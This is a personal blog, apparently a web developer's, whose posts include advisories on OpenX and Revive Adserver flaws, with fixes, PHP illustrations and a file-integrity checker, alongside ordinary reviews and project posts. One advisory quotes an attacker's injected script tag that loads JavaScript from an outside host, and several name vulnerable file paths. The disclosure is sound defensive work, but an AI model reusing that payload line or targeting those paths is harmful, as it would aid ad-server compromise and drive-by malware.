18. December 2013

Zero Day Vulnerability in OpenX Source 2.8.11 and Revive Adserver 3.0.1


The current versions of the popular ad server software OpenX Source (2.8.11) and Revive Adserver (3.0.1) are vulnerable to a SQL injection attack which allows attackers to gain access to the admin backend. The vulnerability is actively being exploited.

The OpenX team has been informed. For Revive, I submitted a pull request with a fix.

Since Revive Adserver is the official successor to OpenX Source, I assume that there will not be an updated version of OpenX Source (after all, there wasn’t one for the last vulnerability). I have created a set of patched files which fix the vulnerability in OpenX 2.8.11: openx-2.8.11-sql-injection-patch.zip. To patch Revive Adserver, use the files from revive-3.0.1-sql-injection-patch.zip.

I recommend applying the patches immediately, since the vulnerability is actively being exploited and has been for some time now.

Update 19.12.: The Revive team confirmed the vulnerability and is working on a fixed version.
Update 20.12.: The Revive team released Revive Adserver 3.0.2, which fixes the vulnerability. If possible, I recommend updating to this version as soon as possible (this includes users of OpenX). Thanks a lot to the team for the quick reaction!
The Revive team also suggests a quicker temporary fix for people who cannot update right away: remove “www/delivery/axmlrpc.php” if you do not need XML-RPC delivery (most setups use different delivery methods).
Update 3.2.2014: Removing axmlrpc.php alone does not seem to be enough to fully protect an installation. dxmlrpc.php should be removed as well. Many thanks to Péter Veres for the discovery!

By the way

If you are managing an OpenX Source or Revive Adserver installation, take a look at the OpenX Maintenance Checklist or Revive Adserver Maintenance Checklist. It helps you keep track of frequent maintenance tasks and security checks. If you sign up for an account at Checkpanel (not required), you can easily manage this checklist. You can see when you last checked each item, set reminders, work in teams and more. Checkpanel is not limited to OpenX/Revive checklists – it helps you manage all kinds of recurring tasks (see some other samples and features).

(This article is also available in German)

11. September 2013

Zero-day Vulnerability in OpenX Source 2.8.11


The current version of the popular ad server software OpenX Source (2.8.11) is vulnerable to code injection attacks by a subset of registered users. The vulnerability is being actively exploited.

The problem can be fixed by changing line 311 in lib/OX/Extension/deliveryLimitations/DeliveryLimitations.php as follows:

$result = 'MAX_check' . ucfirst($this->group) . '_' . $this->component . "('".addslashes($data)."', '".addslashes($this->comparison)."')";

Users of OpenX should apply this fix immediately, even if only trusted parties have access to the installation. The vulnerability is used in conjunction with other vulnerabilities to gain system access through hijacked accounts.
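To see why the addslashes() calls in the fix matter, here is an added illustration (not OpenX code, and not from the original post): a stand-alone function that builds the same kind of limitation expression, once without escaping and once with it, and then evaluates both the way the delivery engine would. That the delivery engine evaluates such expressions as PHP is an assumption for this demo (the post calls the bug a code injection); the function names, the stub MAX_checkGeo_Country() and the sample value are assumptions too.

```php
<?php
// Added example, not OpenX code: the shape of the limitation expression that
// DeliveryLimitations.php builds, once without escaping (the vulnerable form)
// and once with the addslashes() calls from the fix. Function and stub names
// are assumptions for this demo.

// Build "MAX_check<Group>_<Component>('<data>', '<comparison>')". The delivery
// engine later evaluates strings of this form as PHP (assumption for the demo;
// the post describes the bug as code injection), so $data and $comparison end
// up inside single-quoted PHP string literals.
function buildLimitation(string $group, string $component, string $data,
                         string $comparison, bool $escape): string
{
    if ($escape) {
        // The fix: inside a single-quoted PHP literal only ' and \ are special,
        // and addslashes() escapes exactly those (plus " and NUL, harmless here).
        $data = addslashes($data);
        $comparison = addslashes($comparison);
    }
    return 'MAX_check' . ucfirst($group) . '_' . $component
        . "('" . $data . "', '" . $comparison . "')";
}

// Stub standing in for a real MAX_check*() delivery function: it just hands
// back what it received so we can see what survives the round trip.
function MAX_checkGeo_Country(string $data, string $comparison): array
{
    return ['data' => $data, 'comparison' => $comparison];
}

// Evaluate an expression the way the delivery engine would, but catch a parse
// error instead of letting it abort the script (PHP 7 or later).
function evaluateLimitation(string $expr): string
{
    try {
        $r = eval('return ' . $expr . ';');
        return 'ok: data=' . var_export($r['data'], true)
            . ' comparison=' . var_export($r['comparison'], true);
    } catch (\ParseError $e) {
        return 'PARSE ERROR: ' . $e->getMessage();
    }
}

// A value a legitimate user could enter in a geo limitation. The quote in it
// is enough to end the string literal in the unescaped form; a user who
// controls such a field controls everything that follows the quote.
$data = "Côte d'Ivoire";

foreach ([false, true] as $escape) {
    $expr = buildLimitation('geo', 'Country', $data, '==', $escape);
    echo $escape ? 'fixed:      ' : 'vulnerable: ', $expr, "\n";
    echo '            ', evaluateLimitation($expr), "\n";
}
```

Run it with php on the command line: the unescaped expression fails to parse (which is what a crafted value turns into attacker-chosen code), the escaped one returns the original value intact. Note that addslashes() is the right call here only because the destination is a single-quoted PHP literal, where just the quote and the backslash are special; it is not a general-purpose sanitizer and should not be reused for other contexts such as SQL or HTML.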

Revive Adserver (a fork of OpenX source) is vulnerable as well. I have submitted a pull request. Update: The Revive team confirmed the issue and accepted my patch on the same day.

By the way

If you are managing an OpenX ad server installation, take a look at the OpenX Maintenance Checklist. It helps you keep track of frequent maintenance tasks and security checks. If you sign up for an account at Checkpanel (not required), you can easily manage this checklist. You can see when you last checked each item, set reminders, work in teams and more. Checkpanel is not limited to OpenX checklists – it helps you manage all kinds of recurring tasks (see some other samples and features).

(This article is also available in German)

Keywords: OpenX, security

28. May 2013

Checkpanel – Continuous Checklists


Checkpanel screenshot

My new project, Checkpanel, went into public beta recently. Checkpanel is a checklist application which focuses on repeating checks. Unlike traditional checklists, Checkpanel keeps track of all reported checks (marking something as working or not working). You can see who last checked a test case, when, and what the errors were. You can also have some checks executed automatically and set reminders for when you would like to check something again. And much more.

I imagined it primarily for use in quality assurance of web apps, for example when you frequently want to check if a recent change broke the contact form or had similar side effects. Of course you can also use it for anything else which needs to be checked frequently.

https://checkpanel.com/ – go try it! :) I’m happy about every beta tester.

9. September 2010

Critical vulnerability in OpenX 2.8.6 & Open Flash Chart 2


There is a critical security flaw in OpenX 2.8.6 (and 2.8.5, and probably several earlier versions) which allows attackers to gain control of the web server account and thus of the ad server. The security hole is being actively exploited in the wild (as I learned the hard way). It seems that this hole is only known to attackers (in the OpenX context) at the moment, since I was not able to find any warning or other reference to it.

The problem lies in the following file:

/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php

The file ships with the video plugin. It is a component of Open Flash Chart 2, which is already known to be vulnerable. Basically, it allows an attacker to upload any file to the server, including PHP scripts. This way, the attacker uploads a PHP backdoor and gains full access to the web server account. From there, the attacker can (amongst other things) take control of the OpenX installation.

In our case, the attacker created a new admin user in the OpenX database called “root”. Interestingly, this user was not shown anywhere in the user accounts. But it did show up in the user log when he appended the following malicious script to one of our ad zones:

<script type="text/javascript" src="http://keyserveronline.com:8080/File.js"></script>

Interestingly, this vulnerability is also still present in the latest version of Open Flash Chart 2. It wouldn’t be hard to fix, but seemingly no one has bothered to release a fix yet. Me neither, since I do not need this component. A simple workaround is to delete ofc_upload_image.php. The core features of OpenX should not be affected, since this file seems to be connected to reports of the video plugin and might even be unused (it is part of a whole library that was bundled as-is). Alternatively, access to the file can be restricted via .htaccess to trusted users.

I highly recommend doing this immediately, since this vulnerability is being actively exploited.

Also check for signs of an already installed backdoor. In our case, the attacker closed the vulnerability himself (presumably so that no one else can take control of his loot), so take a look at the file before deleting it and compare it with the one that ships with OpenX. If it has been edited, you have probably already been hacked and a backdoor is installed.
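An added PHP command-line script (not part of OpenX or Revive, and not from the original post) that does the comparison the previous paragraph asks for, and also covers the two XML-RPC delivery scripts from the December 2013 post above: it compares selected files of a live installation with a pristine copy of the same release and reports absent, unchanged or MODIFIED for each, then lists PHP files present in the installation that the release does not contain at all. The install path, the location of the pristine copy and the file list are assumptions to adjust to your setup.

```php
<?php
// Added example, not OpenX/Revive code. Compares security-relevant files of a
// live installation with a pristine copy of the same release (a fresh
// download from a trusted source, unpacked outside the web root) and reports
// absent / unchanged / MODIFIED for each. Paths and the file list are
// assumptions; adjust them to your setup. Usage:
//   php check-openx-files.php /var/www/openx /tmp/openx-pristine

// Files discussed on this page. For the upload script, and for the two
// XML-RPC delivery scripts if you do not use XML-RPC delivery, "absent" is
// the state the workarounds leave behind. "MODIFIED" on any of them means
// the file was edited after installation: treat that as a compromise.
const WATCHED_FILES = [
    'www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php',
    'www/delivery/axmlrpc.php',
    'www/delivery/dxmlrpc.php',
];

// Classify one relative path by comparing SHA-256 hashes of both copies.
function classifyFile(string $liveRoot, string $pristineRoot, string $relPath): string
{
    $live = "$liveRoot/$relPath";
    $pristine = "$pristineRoot/$relPath";
    if (!is_file($live)) {
        return 'absent';
    }
    if (!is_file($pristine)) {
        // Exists in the install but not in the release: suspicious by itself.
        return 'MODIFIED (not in pristine copy)';
    }
    return hash_file('sha256', $live) === hash_file('sha256', $pristine)
        ? 'unchanged' : 'MODIFIED';
}

// List PHP files in the live tree that the release does not contain at all;
// an uploaded backdoor usually shows up here. Files OpenX itself generates
// at install time (configuration, plugin and cache files) show up too, so
// review the list instead of deleting blindly.
function extraPhpFiles(string $liveRoot, string $pristineRoot): array
{
    $extra = [];
    $iterator = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($liveRoot, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iterator as $file) {
        if (strtolower($file->getExtension()) !== 'php') {
            continue;
        }
        $rel = substr($file->getPathname(), strlen($liveRoot) + 1);
        if (!is_file("$pristineRoot/$rel")) {
            $extra[] = $rel;
        }
    }
    sort($extra);
    return $extra;
}

// Exit status 0 = nothing suspicious, 1 = something to look at, 2 = usage error.
function main(array $argv): int
{
    if (count($argv) !== 3) {
        fwrite(STDERR, "usage: php {$argv[0]} <live-install-dir> <pristine-copy-dir>\n");
        return 2;
    }
    $liveRoot = rtrim($argv[1], '/');
    $pristineRoot = rtrim($argv[2], '/');
    $suspicious = 0;

    foreach (WATCHED_FILES as $rel) {
        $status = classifyFile($liveRoot, $pristineRoot, $rel);
        if (strpos($status, 'MODIFIED') === 0) {
            $suspicious++;
        }
        printf("%-9s %s\n", $status, $rel);
    }
    foreach (extraPhpFiles($liveRoot, $pristineRoot) as $rel) {
        $suspicious++;
        printf("%-9s %s\n", 'EXTRA', $rel);
    }
    return $suspicious > 0 ? 1 : 0;
}

exit(main($argv));
```

The comparison is only meaningful against the same release version as the installation, obtained from a trusted source. A clean report does not prove the absence of a backdoor (the script only sees files, not the database entries the next section describes), but a MODIFIED or unexpected EXTRA entry is a strong sign that the re-installation steps below are needed.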

What to do once the server has been hacked (Update 11.9.2010)

If you think your server has been compromised, you need to make sure that you get rid of all backdoors that might have been hidden in your system. Finding a backdoor in a compromised OpenX is tricky at best, so better get rid of the original installation completely.

Re-install OpenX and apply the fix mentioned above. Do not keep any files of the old installation. Delete or archive everything that you did not install freshly from a trusted source.

Check your database. Take a look at the table ox_users and delete every entry that does not represent a trusted user. Check the prepend and append fields of all banners and zones. Remove suspicious code.

Change your passwords.

If you want to be absolutely sure, you would have to re-install the whole server, because it might have been rooted. But if your server was configured securely and did not contain any vulnerabilities that can be exploited by local users (that is, privilege escalation from the web server account), the chances of this are moderately low. Decide for yourself if you want to take this time-consuming measure.

Keywords: OpenX, security, web development

12. July 2009

bbPress compatibility plugin for TinyMCE


I’m currently using the WYSIWYG editor TinyMCE with bbPress for a project. Unfortunately, bbPress doesn’t like it when it gets <p> tags through TinyMCE and therefore messes up the post. I have written an (extremely) simple plugin for TinyMCE which transforms <p>s into double linebreaks before posting therefore preserving compatibility. <br />s are transformed into single linebreaks.

The plugin is based on the BBCode plugin by Moxiecode Systems AB distributed together with TinyMCE, so they deserve most of the credit. I only adjusted a few replacement calls.

Currently there is one disadvantage: When you want to edit an existing post, double linebreaks are not converted back into <p>s, but into double <br />s. This usually looks just fine, but is not perfect.

Installation

Unpack the zip file into the TinyMCE plugins folder. Add “bbpress” to the list of activated plugins.
Important: Also set remove_linebreaks to false, or all linebreaks will get removed by TinyMCE.

Download

bbPress Plugin for TinyMCE 0.2
bbPress Plugin for TinyMCE 0.1

Keywords: bbPress, plugins, TinyMCE

9. March 2009

Music Intersector Now With Up to Five Users


Some time ago, I created a little addon to Last.fm called Music Intersector. It shows which bands are common between the favorites of two users. As you might have noticed, Last.fm has integrated this functionality into its own system, so my old music intersector became a bit pointless.

Not anymore. I just updated it and it can now show the musical similarities between up to five users. Perfect for small parties and gatherings. :)

» Music Intersector

Unfortunately, the number of results declines extremely rapidly with more than two users. There is not much that I can do about it, since Last.fm only offers access to the top 50 artists and not the whole profile.

Keywords: intersection, last.fm, music, recommendation

7. February 2009

Ars Electronica Festival 2008: Photos, Impressions and Links

Ars Electronica 2008

Last year, I was at the Ars Electronica Festival in Linz, Austria. Unfortunately, I was too busy with beyond vision to post my impressions immediately, but now I’m going to make up for it. In the months that have passed, my memory of the event has faded a bit, but I’ll do my best to convey an adequate overview, with the help of tons of pictures.

All in all, I was not as impressed by the festival in 2008 as I was in 2007. In part, this is because I visited the Ars Electronica Center exhibition for the first time in 2007. That exhibition is one of the greatest, but it did not change a lot from 2007 to 2008, so it was kind of “old news” for me this time.

By the way, visiting the Ars Electronica Festival on a Saturday turned out not to be a problem. At first I was worried that the exhibitions would be overcrowded on the weekend, but it wasn’t much different than on the weekday the year before. The decision not to buy a day ticket was also right. I spent much less on single exhibition fees than a day ticket would have cost.

And now for the pictures…

» read on!

(This article is also available in German)

Keywords: Ars Electronica, art, Austria, exhibition, festival, Linz, photos, report

19. January 2009

beyond vision


beyond vision

There is one project that I was working on, but never found the time to tell you about: beyond vision. It is the largest project that I have done so far and it required so much time that I didn’t have any time left to write about it. :) But in December it was finally completed, so now there is time to tell:

18 musicians, 7 huge screens. beyond vision is the fusion of music and film – not just music with visual support and not just film with film music. Together, both media tell an abstract story in a way that would not be possible for either medium alone.

I already set up a small page full with information about this project, so I will not copy it here. If you are interested, just take a look at the following link:

» beyond vision

I am sorry that I did not have the time to mention this project earlier. I guessed that most of you are probably not from Germany so the tour dates would probably not have been very interesting for you. :) And now, at least I have some more material to show you (don’t miss the photos).

I hope I will be able to show you some more background information soon. A documentary is already in the making, so hopefully I can show you some video footage from the performances at some point…

Keywords: beyond vision, concert, installation, meta, music, video

5. January 2009

My Dell UltraSharp 2709W (Review / Test)

Dell UltraSharp 2709W

Ok, “my” is not quite right in this case. Not too long ago I bought a new monitor, the Samsung SyncMaster 226bw, and I would not be so decadent as to buy yet another new monitor so soon. :) I am using the Dell UltraSharp 2709W for a larger project, but I do not own it. A bold 27” screen size and a resolution of 1920×1200 come in quite handy for video post-processing. Too bad I’ll have to return it some day…

Specs

Screen size: 27”
Resolution: 1920×1200
Video ports: DVI, VGA, HDMI, DisplayPort, Composite Video, Component Video
Viewing angles: 178°/178° (Standard)
Contrast: 3000:1 (dynamic), Standard
Response time: 6 ms (Grey to grey), Standard
Energy consumption: 57 W (standard); 110 W (max)
Panel technology: S-PVA
Integrated speakers: no
Other integrated accessories: 4 port USB hub, 9-in-2 card reader
Price: Bought in July 2008 directly from Dell for 623 Euros. Current price: 831,81€

First Impression

A Dell UltraSharp 2709W on my desktop

After unboxing my 2709W, my first thought was “yay, biiig”. :) The UltraSharp 2709W only just fits on my desk together with my laptop and old monitor. The second monitor has to be turned upright to fit beside the large 27” screen.
My personal command center. :)

Design

Visually, this large monitor has nothing to hide. It is well built and has a beautifully simple design, which is not spoiled by pointless speakers either. The material itself does not feel or look cheap, although Dell’s official product photo does not look that convincing. Fortunately, it looks better in reality.

One reason why the monitor looks so beautifully simple is that there are very few visible buttons. Only the power button permanently emits a blue or orange light. The other buttons for the menu controls are very small LED rectangles, which stay black and mostly invisible when not in use. They only wake up and light up when you approach them with your hand or finger. This is quite cool, although the technology still seems to have a few hiccups – more about this later.

Image Quality: See next page

(This article is also available in German)

Keywords: computer, Dell, display, hardware, LCD, monitor, review, screen, test, TFT

1. October 2008

My Name is Bruce (Movie Review)


My Name is Bruce - Poster

Plot Preview

Bruce Campbell (Bruce Campbell) is currently busy producing his newest movie, the terrific Cave Alien 2, when a young fanboy* asks for his help. He accidentally released an ancient Chinese demon that has now set out to slaughter everyone who is related to the fanboy – coming from a small town, this puts its whole population on the brink of a bloody death.

The passionate Bruce Campbell fan sees only one solution to this problem: Bruce himself has to save the town, utilizing the elite monster-slaying powers he acquired acting in various grand movies like Evil Dead. The True Fan faithfully overlooks the dramatic downfall which Bruce’s career has taken since his heyday. Neither is Fanboy irritated by the fact that his idol turns out to be the most arrogant asshole alive, who couldn’t care less about his fans and annoyingly keeps hitting on Fanboy’s mother (and pretty much any other female).

Thanks to some gentle persuasion involving a baseball bat and Bruce’s subsequent erroneous assumption that the whole story is just an elaborate birthday present from his manager (Ted Raimi), he agrees to take up the fight against the demon…

Review

My Name is Bruce: Evil Chinese Demon Spirit

As one might guess from the plot description, My Name is Bruce is not exactly a movie that is meant to be taken seriously. It is a parody – primarily on Bruce Campbell himself, but also on the movies in which he acted.

» read on!

(This article is also available in German)

Keywords: Bruce Campbell, comedy, horror, movies, review
